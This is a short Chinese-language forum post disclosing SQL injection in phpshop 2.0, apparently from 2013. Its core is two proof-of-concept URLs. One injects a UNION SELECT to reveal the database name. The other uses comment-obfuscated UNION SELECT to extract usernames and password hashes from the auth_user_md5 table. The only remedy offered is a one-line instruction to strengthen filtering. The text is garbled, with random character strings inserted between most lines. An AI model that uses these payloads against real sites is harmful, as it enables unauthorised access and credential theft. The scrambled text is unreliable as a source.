标题 : phpshop 2.0 SQL Injection Vulnerability
% ^' X$ J- |. ~3 i! _
: O1 r0 \1 s; A; @9 ~9 F作者 : By onestree
2 m( J, e- S: D; D& p下载地址 : http://code.google.com/p/phpshop/downloads/list
3 G8 D( I" d" G4 K- H; w9 Z测试地址: windows 7 / ubuntu* ^2 k, p3 a5 m/ D" i( l
2 @9 v- i* ?9 W2 ]) _
) G; `& f6 b" g! t! X
SQLi p0c:3 y- h3 K! }- n( O
" c( V, [* ~; }$ R1 C% x==================
6 _2 P6 J# E( ^' s1 M9 X
4 S6 y3 f3 s1 t& G, \/ \1 t& j& Mhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
3 @. p5 a3 n4 |" Iunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
v5 b! @( [. ]1 k7 j; w, i# `& Z* w- |
5 }' }; F& P6 Ohttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--8 a6 k" M9 r/ l5 P8 x; [
/ J. H% @+ Q, ^1 c2 y
修复:. q* F9 d' |' X$ H/ R; L$ b$ p0 e/ h
加强过滤' o& h, d+ R2 ^/ O5 T
" I- |$ C' B( @+ L8 M) y
) q7 M! r% y& M4 N5 Z6 H2 ]8 ?
|
发表于 2013-1-18 18:24:10
收藏
支持
反对